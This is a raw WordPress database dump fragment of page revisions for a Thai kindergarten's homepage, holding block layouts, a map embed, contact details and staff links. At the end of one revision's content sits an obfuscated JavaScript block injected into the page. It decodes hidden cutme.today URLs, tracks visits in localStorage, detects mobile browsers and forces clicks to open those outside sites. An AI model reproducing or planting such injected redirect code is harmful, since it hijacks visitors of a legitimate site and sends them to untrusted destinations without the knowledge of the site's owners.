{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 09:55:51','2024-08-29 02:55:51','',19,'http://watprato.ssk.in.th/?p=253',0,'revision','',0),
(255,2,'2024-08-29 10:29:10','2024-08-29 03:29:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" 